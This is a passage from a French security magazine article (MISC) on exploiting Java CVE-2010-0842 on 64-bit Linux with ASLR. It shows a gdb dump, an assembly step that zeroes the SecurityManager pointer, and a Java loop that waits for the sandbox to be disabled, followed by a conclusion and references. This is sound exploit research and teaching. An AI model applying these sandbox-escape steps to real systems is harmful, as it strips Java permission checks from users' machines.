						<td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-5997722bc4861485073699-1"><span class="crayon-sy">(</span><span class="crayon-v">gdb</span><span class="crayon-sy">)</span><span class="crayon-h"> </span><span class="crayon-v">x</span><span class="crayon-o">/</span><span class="crayon-cn">30gx</span><span class="crayon-h"> </span><span class="crayon-cn">0x7f6443c2ec70</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc4861485073699-2"><span class="crayon-cn">0x7f6443c2ec70</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-cn">0x00007f6473ac6298</span><span class="crayon-h"> </span><span class="crayon-cn">0x00007f6473af9870</span></div><div class="crayon-line" id="crayon-5997722bc4861485073699-3"><span class="crayon-cn">0x7f6443c2ec80</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-cn">0x0000000000000000</span><span class="crayon-h"> </span><span class="crayon-cn">0x00007f6473ab13a0</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc4861485073699-4"><span class="crayon-cn">0x7f6443c2ec90</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-cn">0x000000267436d001</span><span class="crayon-h"> </span><span class="crayon-cn">0x00007f6443c1fbb8</span></div><div class="crayon-line" id="crayon-5997722bc4861485073699-5"><span class="crayon-cn">0x7f6443c2eca0</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-cn">0x00007f6443c2ea28</span><span class="crayon-h"> </span><span class="crayon-cn">0x0000000000000000</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc4861485073699-6"><span class="crayon-sy">[</span>…<span class="crayon-sy">]</span></div></div></td>
					</tr>
				</table>
			</div>
		</div>
<!-- [Format Time: 0.0011 seconds] -->
<p><span style="font-family: Verdana, Geneva; font-size: 14px;">Nous voyons que le pointeur vers le <span style="color: #ff0000;"><b>SecurityManager</b></span> se trouve à -24 octets de la classe <span style="color: #ff0000;"><b>System</b></span>. Voici le code pour l’initialiser à 0 :</span></p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->

		<div id="crayon-5997722bc4866065373564" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;">
		
			<div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span>
			<div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Afficher/cacher numéros de lignes"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Basculer vers code brut"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Ouvrir le code dans une nouvelle fenêtre"><div class="crayon-button-icon"></div></div></div></div>
			<div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div>
			<div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;">
8 : movq $0x0,-0x18(%rbx) # initialise le pointeur vers le SecurityManager à zéro</textarea></div>
			<div class="crayon-main" style="">
				<table class="crayon-table">
					<tr class="crayon-row">
				<td class="crayon-nums " data-settings="show">
					<div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-5997722bc4866065373564-1">1</div></div>
				</td>
						<td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-5997722bc4866065373564-1"><span class="crayon-cn">8</span> <span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-i">movq</span><span class="crayon-h"> </span><span class="crayon-sy">$</span><span class="crayon-cn">0x0</span><span class="crayon-sy">,</span><span class="crayon-o">-</span><span class="crayon-cn">0x18</span><span class="crayon-sy">(</span><span class="crayon-o">%</span><span class="crayon-v">rbx</span><span class="crayon-sy">)</span><span class="crayon-h"> </span><span class="crayon-p"># initialise le pointeur vers le SecurityManager à zéro</span></div></div></td>
					</tr>
				</table>
			</div>
		</div>
<!-- [Format Time: 0.0006 seconds] -->
<p><span style="font-family: Verdana, Geneva; font-size: 14px;">Finalement, nous allons retourner en Java pour exécuter le code de l’analyste. Malheureusement, comme la pile a été détruite et que certains registres ont été modifiés, il n’est pas possible de continuer l’exécution du code natif sans planter le programme. Cependant, comme la librairie <span style="color: #ff0000;"><b>jsound</b></span> tourne dans son propre thread, nous allons simplement boucler indéfiniment en utilisant l’instruction suivante :</span></p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->

		<div id="crayon-5997722bc486b107533900" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;">
		
			<div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span>
			<div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Afficher/cacher numéros de lignes"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Basculer vers code brut"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Ouvrir le code dans une nouvelle fenêtre"><div class="crayon-button-icon"></div></div></div></div>
			<div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div>
			<div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;">
9: jmp 9</textarea></div>
			<div class="crayon-main" style="">
				<table class="crayon-table">
					<tr class="crayon-row">
				<td class="crayon-nums " data-settings="show">
					<div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-5997722bc486b107533900-1">1</div></div>
				</td>
						<td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-5997722bc486b107533900-1"><span class="crayon-cn">9</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-i">jmp</span><span class="crayon-h"> </span><span class="crayon-cn">9</span></div></div></td>
					</tr>
				</table>
			</div>
		</div>
<!-- [Format Time: 0.0004 seconds] -->
<p><span style="font-family: Verdana, Geneva; font-size: 14px;">Le thread principal de l’application Java va, lui, boucler jusqu’à ce que le <span style="color: #ff0000;"><b>SecurityManager</b></span> soit désactivé :</span></p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->

		<div id="crayon-5997722bc4870390314184" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;">
		
			<div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span>
			<div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Afficher/cacher numéros de lignes"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Basculer vers code brut"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Ouvrir le code dans une nouvelle fenêtre"><div class="crayon-button-icon"></div></div></div></div>
			<div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div>
			<div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;">
while (System.getSecurityManager() != null) {
   Thread.sleep(100);
}</textarea></div>
			<div class="crayon-main" style="">
				<table class="crayon-table">
					<tr class="crayon-row">
				<td class="crayon-nums " data-settings="show">
					<div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-5997722bc4870390314184-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc4870390314184-2">2</div><div class="crayon-num" data-line="crayon-5997722bc4870390314184-3">3</div></div>
				</td>
						<td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-5997722bc4870390314184-1"><span class="crayon-st">while</span><span class="crayon-h"> </span><span class="crayon-sy">(</span><span class="crayon-v">System</span><span class="crayon-sy">.</span><span class="crayon-e">getSecurityManager</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span><span class="crayon-h"> </span><span class="crayon-o">!=</span><span class="crayon-h"> </span><span class="crayon-t">null</span><span class="crayon-sy">)</span><span class="crayon-h"> </span><span class="crayon-sy">{</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc4870390314184-2"><span class="crayon-h">&nbsp;&nbsp; </span><span class="crayon-v">Thread</span><span class="crayon-sy">.</span><span class="crayon-e">sleep</span><span class="crayon-sy">(</span><span class="crayon-cn">100</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span></div><div class="crayon-line" id="crayon-5997722bc4870390314184-3"><span class="crayon-sy">}</span></div></div></td>
					</tr>
				</table>
			</div>
		</div>
<!-- [Format Time: 0.0008 seconds] -->
<p><span style="font-family: Verdana, Geneva; font-size: 14px;">Ensuite il aura le champ libre, car plus aucun contrôle de permission ne sera effectué…</span></p>
<h1 class="western">Conclusion</h1>
<p><span style="font-family: Verdana, Geneva; font-size: 14px;">L’exploitation des deux vulnérabilités du CVE-2010-0842 sous un système Debian testing 64 bits reste relativement facile malgré la randomisation des adresses des segments de code en mémoire (ASLR). Cela est dû au fait que le binaire java ne soit pas compilé en PIE, ce qui fournit un nombre important de gadgets pour contourner ASLR. La présence de ce binaire à adresse fixe facilitera aussi le contournement d’autres moyens de défense comme le bit NX qui rend la pile non exécutable. Malheureusement, la dernière version de Java (8) n’est toujours pas compilée avec PIE.</span></p>
<p><span style="font-family: Verdana, Geneva; font-size: 14px;">Le nombre d’exploits Java au niveau du code natif a tendance à augmenter, car de nombreuses vulnérabilités y sont découvertes et les attaquants ont un niveau technique suffisant pour les exploiter <b>[7]</b>. Par exemple, CVE-2013-1491 <b>[8]</b> exploite Java 7 sous Windows 8.</span></p>
<p align="right"><span style="font-family: Verdana, Geneva; font-size: 14px;"><b>Alexandre Bartel<br />
</b>alexandre.bartel@uni.lu</span></p>
<h1 class="western">Remerciements</h1>
<p><span style="font-family: Verdana, Geneva; font-size: 14px;">Je tiens à remercier Andreas Follner et Philipp Holzinger pour les discussions fructueuses à propos des exploits Java ainsi que Patrick Ventuzelo pour la relecture de l&rsquo;article.</span></p>
<h1 class="western">Références</h1>
<p><span style="font-size: 14px;"><span style="font-family: Verdana, Geneva;"><b><span lang="fr-FR">[1] </span></b><span lang="fr-FR">Philipp Holzinger, Stefan Triller, Alexandre Bartel and Eric Bodden : </span><i><span lang="fr-FR">An In-Depth Study of More Than Ten Years of Java Exploitation</span></i><span lang="fr-FR">, Proceedings of the 23rd ACM Conference on Computer and Communications Security (CCS&rsquo;16) : </span><span lang="fr-FR"><a href="http://www.abartel.net/static/p/ccs2016-10yearsJavaExploits.pdf" target="_blank" rel="noopener">http://www.abartel.net/static/p/ccs2016-10yearsJavaExploits.pdf</a></span><b><span lang="fr-FR"><br />
</span></b></span><span style="font-family: Verdana, Geneva;"><b><span lang="fr-FR">[2] </span></b><span lang="fr-FR">MITRE, </span><i><span lang="fr-FR">CVE-2010-0842</span></i><span lang="fr-FR">, 2010 : </span><span lang="fr-FR"><a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0842" target="_blank" rel="noopener">http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0842</a></span><span lang="fr-FR"><br />
</span><b> </b></span><span style="font-family: Verdana, Geneva;"><b><span lang="fr-FR">[3] </span></b><span lang="fr-FR">Peter Vreugdenhil, </span><i><span lang="fr-FR">Java parse vulnerabilities</span></i><span lang="fr-FR">, May 21st 2010 : </span><span lang="fr-FR"><a href="http://vreugdenhilresearch.nl/java-midi-parse-vulnerabilities/" target="_blank" rel="noopener">http://vreugdenhilresearch.nl/java-midi-parse-vulnerabilities/</a></span><span lang="fr-FR"><br />
</span><b> </b></span><span style="font-family: Verdana, Geneva;"><b><span lang="fr-FR">[4] </span></b><span lang="fr-FR">PSHAPE : </span><span lang="fr-FR"><a href="https://sites.google.com/site/exploitdevpshape/" target="_blank" rel="noopener">https://sites.google.com/site/exploitdevpshape/</a></span><span lang="fr-FR"><br />
</span><b> </b></span><span style="font-family: Verdana, Geneva;"><b><span lang="fr-FR">[5] </span></b><i><span lang="fr-FR">Defuse online Disassembler</span></i><span lang="fr-FR"> : </span><span lang="fr-FR"><a href="https://defuse.ca/online-x86-assembler.htm" target="_blank" rel="noopener">https://defuse.ca/online-x86-assembler.htm</a></span><span lang="fr-FR"><br />
</span><b> </b></span><span style="font-family: Verdana, Geneva;"><b><span lang="fr-FR">[6] </span></b><span lang="fr-FR">Izik Kotler, </span><i><span lang="fr-FR">Smack the Stack</span></i><span lang="fr-FR">, 2005 : </span><span lang="fr-FR"><a href="http://web.textfiles.com/hacking/smackthestack.txt" target="_blank" rel="noopener">http://web.textfiles.com/hacking/smackthestack.txt</a></span><span lang="fr-FR"><br />
</span><b> </b></span><span style="font-family: Verdana, Geneva;"><b><span lang="fr-FR">[7] </span></b><span lang="fr-FR">Jack Tang, </span><i>Java Native Layer Exploits Going Up</i>, 2013 : <span lang="fr-FR"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/java-native-layer-exploits-going-up/" target="_blank" rel="noopener">http://blog.trendmicro.com/trendlabs-security-intelligence/java-native-layer-exploits-going-up/</a></span><span lang="fr-FR"><br />
</span><b> </b></span><span style="font-family: Verdana, Geneva;"><b><span lang="fr-FR">[8]</span></b><span lang="fr-FR"> Yuki Chen, 2013 : </span><a href="https://github.com/guhe120/CVE20131491-JIT" target="_blank" rel="noopener"><span lang="fr-FR">https://github.com/guhe120/CVE20131491-JIT</span></a></span></span></p>
<p style="text-align: center;"><span style="background-color: #99cc00; color: #ffffff;"><strong>Retrouvez cet article (et bien d&rsquo;autres) dans <em>MISC n°89</em>, disponible sur <span style="text-decoration: underline;"><a href="https://boutique.ed-diamond.com/home/1157-misc-89.html?search_query=misc89&amp;results=1" target="_blank" rel="noopener"><span style="color: #ffffff; text-decoration: underline;">la boutique</span></a></span> et </strong><span style="text-decoration: underline;"><a href="http://connect.ed-diamond.com/" target="_blank" rel="noopener"><span style="color: #ffffff; text-decoration: underline;"><strong>sur la plateforme de lecture en</strong></span></a><a href="http://connect.ed-diamond.com/" target="_blank" rel="noopener"><span style="color: #ffffff; text-decoration: underline;"><strong> lig</strong></span></a><a href="http://connect.ed-diamond.com/" target="_blank" rel="noopener"><span style="color: #ffffff; text-decoration: underline;"><strong>ne</strong></span></a><a href="http://connect.ed-diamond.com/" target="_blank" rel="noopener"><span style="color: #ffffff; text-decoration: underline;"><strong> Conn</strong></span></a><a href="http://connect.ed-diamond.com/" target="_blank" rel="noopener"><span style="color: #ffffff; text-decoration: underline;"><strong>ect</strong></span></a><a href="http://connect.ed-diamond.com/" target="_blank" rel="noopener"><span style="color: #ffffff; text-decoration: underline;"><strong> !</strong></span></a></span></span></p>
	<!-- Social Sharing by Danny - v1.2.7 - https://wordpress.org/plugins/dvk-social-sharing/ -->
	<p class="dvk-social-sharing ss-icon-size-32">
        			<span class="ss-ask">Partager :</span>
		
        <a rel="external nofollow" class="ss-twitter" href="https://twitter.com/intent/tweet/?text=Architecture+64+bits%2FASLR%E2%80%AF%3A+quelles+cons%C3%A9quences+pour+les+exploits+32+bits%E2%80%AF%3F+%C3%89tude+de+cas+avec+Java+et+le+CVE-2010-0842+%E2%80%93+Partie+2%2F2&url=http%3A%2F%2Fwww.miscmag.com%2F%3Fp%3D630" target="_blank">
					<span class="ss-icon ss-icon-twitter"></span>
					<span class="ss-text">sur Twitter</span>
					</a> <a rel="external nofollow" class="ss-facebook" href="https://www.facebook.com/sharer/sharer.php?s=100&p[url]=http%3A%2F%2Fwww.miscmag.com%2F%3Fp%3D630&p[title]=Architecture+64+bits%2FASLR%E2%80%AF%3A+quelles+cons%C3%A9quences+pour+les+exploits+32+bits%E2%80%AF%3F+%C3%89tude+de+cas+avec+Java+et+le+CVE-2010-0842+%E2%80%93+Partie+2%2F2" target="_blank" >
						<span class="ss-icon ss-icon-facebook"></span>
						<span class="ss-text">sur Facebook</span>
					</a> <a rel="external nofollow" class="ss-googleplus" href="https://plus.google.com/share?url=http%3A%2F%2Fwww.miscmag.com%2F%3Fp%3D630" target="_blank" >
						<span class="ss-icon ss-icon-googleplus"></span>
						<span class="ss-text">sur Google+</span>
					</a>     </p>
    <!-- / Social Sharing By Danny -->
   			</div><!-- .entry-content -->
	<footer class="entry-meta">
		<p>
						<span class="cat-links">
				Publié dans :  <a href="http://www.miscmag.com/?cat=52" rel="category">article</a>			</span>
			<span class="sep"> | </span>
			
						<span class="tag-links">
				Étiqueté : <a href="http://www.miscmag.com/?tag=64-bit" rel="tag">64 bit</a>, <a href="http://www.miscmag.com/?tag=aslr" rel="tag">ASLR</a>, <a href="http://www.miscmag.com/?tag=exploit" rel="tag">Exploit</a>, <a href="http://www.miscmag.com/?tag=java" rel="tag">java</a>, <a href="http://www.miscmag.com/?tag=rop" rel="tag">ROP</a>			</span>
			
				</p>
	</footer><!-- #entry-meta -->

</article><!-- #post-630 -->
					<nav role="navigation" id="nav-below" class="site-navigation post-navigation">
		<h1 class="assistive-text">Parcourir les articles</h1>

	
		<div class="nav-previous"><a href="http://www.miscmag.com/?p=623" rel="prev"><span class="meta-nav">&larr;</span> Architecture 64 bits/ASLR : quelles conséquences pour les exploits 32 bits ? Étude de cas avec Java et le CVE-2010-0842 &#8211; Partie 1/2</a></div>		<div class="nav-next"><a href="http://www.miscmag.com/?p=637" rel="next">IP Squatting appliqué au SPAM &#8211; Partie 1/2 <span class="meta-nav">&rarr;</span></a></div>
	
	</nav><!-- #nav-below -->
	
					<div id="comments" class="comments-area">
	
	
	
	
		<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">Laisser un commentaire <small><a rel="nofollow" id="cancel-comment-reply-link" href="/?p=630#respond" style="display:none;">Annuler la réponse.</a></small></h3><p class="must-log-in">Vous devez <a href="http://www.miscmag.com/wp-login.php?redirect_to=http%3A%2F%2Fwww.miscmag.com%2F%3Fp%3D630">être connecté·e</a> pour rédiger un commentaire.</p>	</div><!-- #respond -->
	
</div><!-- #comments .comments-area -->

			
			</div><!-- #content -->
		</div><!-- #primary .site-content -->

		<div id="secondary" class="widget-area" role="complementary">
						<aside id="text-2" class="widget widget_text"><h1 class="widget-title">Suivez-nous !</h1>			<div class="textwidget"><a href="https://twitter.com/MISCRedac" class="twitter-follow-button" data-show-count="false" data-lang="fr" data-size="large">Suivre @MISCRedac</a>
<script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0],p=/^http:/.test(d.location)?'http':'https';if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src=p+'://platform.twitter.com/widgets.js';fjs.parentNode.insertBefore(js,fjs);}}(document, 'script', 'twitter-wjs');</script></div>
		</aside><aside id="widget_sp_image-2" class="widget widget_sp_image"><h1 class="widget-title">En kiosque !</h1><a href="https://boutique.ed-diamond.com/en-kiosque/1255-misc-92.html" target="_blank" class="widget_sp_image-image-link" title="En kiosque !"><img width="225" height="300" alt="En kiosque !" class="attachment-medium aligncenter" style="max-width: 100%;" srcset="http://www.miscmag.com/wp-content/uploads/2017/06/misc92-1-225x300.jpg 225w, http://www.miscmag.com/wp-content/uploads/2017/06/misc92-1-768x1024.jpg 768w, http://www.miscmag.com/wp-content/uploads/2017/06/misc92-1.jpg 794w" sizes="(max-width: 225px) 100vw, 225px" src="http://www.miscmag.com/wp-content/uploads/2017/06/misc92-1-225x300.jpg" /></a></aside><aside id="widget_sp_image-15" class="widget widget_sp_image"><a href="http://www.6cure.com/" target="_blank" class="widget_sp_image-image-link"><img width="416" height="347" class="attachment-full" style="max-width: 100%;" srcset="http://www.miscmag.com/wp-content/uploads/2017/04/Pavé_web_Misc_6cure.png 416w, http://www.miscmag.com/wp-content/uploads/2017/04/Pavé_web_Misc_6cure-300x250.png 300w" sizes="(max-width: 416px) 100vw, 416px" src="http://www.miscmag.com/wp-content/uploads/2017/04/Pavé_web_Misc_6cure.png" /></a></aside><aside id="widget_sp_image-9" class="widget widget_sp_image"><a href="https://proboutique.ed-diamond.com/abo-pro-basedoc" target="_blank" class="widget_sp_image-image-link"><img width="740" height="236" class="attachment-full" style="max-width: 100%;" srcset="http://www.miscmag.com/wp-content/uploads/2017/03/connect-boutonAbo-Pro.png 740w, http://www.miscmag.com/wp-content/uploads/2017/03/connect-boutonAbo-Pro-300x96.png 300w" sizes="(max-width: 740px) 100vw, 740px" src="http://www.miscmag.com/wp-content/uploads/2017/03/connect-boutonAbo-Pro.png" /></a></aside><aside id="widget_sp_image-13" class="widget widget_sp_image"><a href="https://boutique.ed-diamond.com/27-base-documentaire" target="_blank" class="widget_sp_image-image-link"><img width="740" height="236" class="attachment-full" style="max-width: 100%;" srcset="http://www.miscmag.com/wp-content/uploads/2017/03/connect-boutonAbo-Part.png 740w, http://www.miscmag.com/wp-content/uploads/2017/03/connect-boutonAbo-Part-300x96.png 300w" sizes="(max-width: 740px) 100vw, 740px" src="http://www.miscmag.com/wp-content/uploads/2017/03/connect-boutonAbo-Part.png" /></a></aside><aside id="widget_sp_image-14" class="widget widget_sp_image"><a href="http://www.formation-technologique.fr/manager-en-ingenierie-informatique-cybersecurite" target="_blank" class="widget_sp_image-image-link"><img width="300" height="251" class="attachment-medium aligncenter" style="max-width: 100%;" srcset="http://www.miscmag.com/wp-content/uploads/2017/04/M2i-banner-300x250-300x251.png 300w, http://www.miscmag.com/wp-content/uploads/2017/04/M2i-banner-300x250.png 400w" sizes="(max-width: 300px) 100vw, 300px" src="http://www.miscmag.com/wp-content/uploads/2017/04/M2i-banner-300x250-300x251.png" /></a></aside><aside id="widget_sp_image-7" class="widget widget_sp_image"><a href="http://www.hsc-formation.fr/" target="_blank" class="widget_sp_image-image-link"><img width="250" height="300" class="attachment-full aligncenter" style="max-width: 100%;" src="http://www.miscmag.com/wp-content/uploads/2017/03/unnamed.gif" /></a></aside>    
<!-- 
	Plugin: Custom Meta Widget	Plugin URL: http://shinraholdings.com/plugins/custom-meta-widget/-->


	<aside id="custommetawidget-2" class="widget customMetaWidget">	<h1 class="widget-title">Connexion</h1>	<ul>
	
	
    <li><a href="http://www.miscmag.com/wp-login.php?action=register">Inscription</a></li><li><a href="http://www.miscmag.com/wp-login.php">Connexion</a></li>	
	</ul>
    
	</aside><aside id="widget_sp_image-6" class="widget widget_sp_image"><a href="http://www.ikoula.com/" target="_blank" class="widget_sp_image-image-link"><img width="300" height="250" class="attachment-medium" style="max-width: 100%;" src="http://www.miscmag.com/wp-content/uploads/2015/01/300x250_gaulois.gif" /></a></aside><aside id="widget_sp_image-4" class="widget widget_sp_image"><h1 class="widget-title">Découvrez notre guide dédié à la sécurité des objets connectés !</h1><a href="https://boutique.ed-diamond.com/en-kiosque/1247-misc-hs-15.html" target="_blank" class="widget_sp_image-image-link" title="Découvrez notre guide dédié à la sécurité des objets connectés !"><img width="225" height="300" alt="Découvrez notre guide dédié à la sécurité des objets connectés !" class="attachment-medium aligncenter" style="max-width: 100%;" srcset="http://www.miscmag.com/wp-content/uploads/2016/09/mischs14-1-225x300.jpg 225w, http://www.miscmag.com/wp-content/uploads/2016/09/mischs14-1.jpg 744w" sizes="(max-width: 225px) 100vw, 225px" src="http://www.miscmag.com/wp-content/uploads/2016/09/mischs14-1-225x300.jpg" /></a></aside><aside id="widget_sp_image-8" class="widget widget_sp_image"><a href="https://boutique.ed-diamond.com/" target="_blank" class="widget_sp_image-image-link"><img width="300" height="252" class="attachment-medium" style="max-width: 100%;" srcset="http://www.miscmag.com/wp-content/uploads/2017/01/pave-boutique-diamond-2017-300x252.jpg 300w, http://www.miscmag.com/wp-content/uploads/2017/01/pave-boutique-diamond-2017.jpg 620w" sizes="(max-width: 300px) 100vw, 300px" src="http://www.miscmag.com/wp-content/uploads/2017/01/pave-boutique-diamond-2017-300x252.jpg" /></a></aside><aside id="tag_cloud-2" class="widget widget_tag_cloud"><h1 class="widget-title">Mots-clés</h1><div class="tagcloud"><a href="http://www.miscmag.com/?tag=64-bit" class="tag-cloud-link tag-link-44 tag-link-position-1" style="font-size: 14.3pt;" aria-label="64 bit (2 éléments)">64 bit</a>
<a href="http://www.miscmag.com/?tag=apt" class="tag-cloud-link tag-link-11 tag-link-position-2" style="font-size: 14.3pt;" aria-label="APT (2 éléments)">APT</a>
<a href="http://www.miscmag.com/?tag=aslr" class="tag-cloud-link tag-link-43 tag-link-position-3" style="font-size: 14.3pt;" aria-label="ASLR (2 éléments)">ASLR</a>
<a href="http://www.miscmag.com/?tag=bgp" class="tag-cloud-link tag-link-38 tag-link-position-4" style="font-size: 14.3pt;" aria-label="BGP (2 éléments)">BGP</a>
<a href="http://www.miscmag.com/?tag=bitcoin" class="tag-cloud-link tag-link-15 tag-link-position-5" style="font-size: 8pt;" aria-label="bitcoin (1 élément)">bitcoin</a>
<a href="http://www.miscmag.com/?tag=cb" class="tag-cloud-link tag-link-14 tag-link-position-6" style="font-size: 8pt;" aria-label="CB (1 élément)">CB</a>
<a href="http://www.miscmag.com/?tag=cloud" class="tag-cloud-link tag-link-12 tag-link-position-7" style="font-size: 8pt;" aria-label="cloud (1 élément)">cloud</a>
<a href="http://www.miscmag.com/?tag=cookies" class="tag-cloud-link tag-link-20 tag-link-position-8" style="font-size: 8pt;" aria-label="cookies (1 élément)">cookies</a>
<a href="http://www.miscmag.com/?tag=cryptographie" class="tag-cloud-link tag-link-26 tag-link-position-9" style="font-size: 22pt;" aria-label="cryptographie (4 éléments)">cryptographie</a>
<a href="http://www.miscmag.com/?tag=domotique" class="tag-cloud-link tag-link-27 tag-link-position-10" style="font-size: 8pt;" aria-label="domotique (1 élément)">domotique</a>
<a href="http://www.miscmag.com/?tag=exploit" class="tag-cloud-link tag-link-41 tag-link-position-11" style="font-size: 14.3pt;" aria-label="Exploit (2 éléments)">Exploit</a>
<a href="http://www.miscmag.com/?tag=hijacking" class="tag-cloud-link tag-link-39 tag-link-position-12" style="font-size: 14.3pt;" aria-label="Hijacking (2 éléments)">Hijacking</a>
<a href="http://www.miscmag.com/?tag=hors-serie" class="tag-cloud-link tag-link-10 tag-link-position-13" style="font-size: 8pt;" aria-label="hors-série (1 élément)">hors-série</a>
<a href="http://www.miscmag.com/?tag=http" class="tag-cloud-link tag-link-32 tag-link-position-14" style="font-size: 8pt;" aria-label="http (1 élément)">http</a>
<a href="http://www.miscmag.com/?tag=intrusion" class="tag-cloud-link tag-link-9 tag-link-position-15" style="font-size: 22pt;" aria-label="intrusion (4 éléments)">intrusion</a>
<a href="http://www.miscmag.com/?tag=iot" class="tag-cloud-link tag-link-28 tag-link-position-16" style="font-size: 14.3pt;" aria-label="IoT (2 éléments)">IoT</a>
<a href="http://www.miscmag.com/?tag=ipv6" class="tag-cloud-link tag-link-24 tag-link-position-17" style="font-size: 8pt;" aria-label="IPv6 (1 élément)">IPv6</a>
<a href="http://www.miscmag.com/?tag=java" class="tag-cloud-link tag-link-42 tag-link-position-18" style="font-size: 14.3pt;" aria-label="java (2 éléments)">java</a>
<a href="http://www.miscmag.com/?tag=messageries" class="tag-cloud-link tag-link-34 tag-link-position-19" style="font-size: 8pt;" aria-label="messageries (1 élément)">messageries</a>
<a href="http://www.miscmag.com/?tag=metasploit" class="tag-cloud-link tag-link-30 tag-link-position-20" style="font-size: 14.3pt;" aria-label="metasploit (2 éléments)">metasploit</a>
<a href="http://www.miscmag.com/?tag=navigateurs-web" class="tag-cloud-link tag-link-16 tag-link-position-21" style="font-size: 8pt;" aria-label="navigateurs web (1 élément)">navigateurs web</a>
<a href="http://www.miscmag.com/?tag=obfuscation" class="tag-cloud-link tag-link-23 tag-link-position-22" style="font-size: 8pt;" aria-label="obfuscation (1 élément)">obfuscation</a>
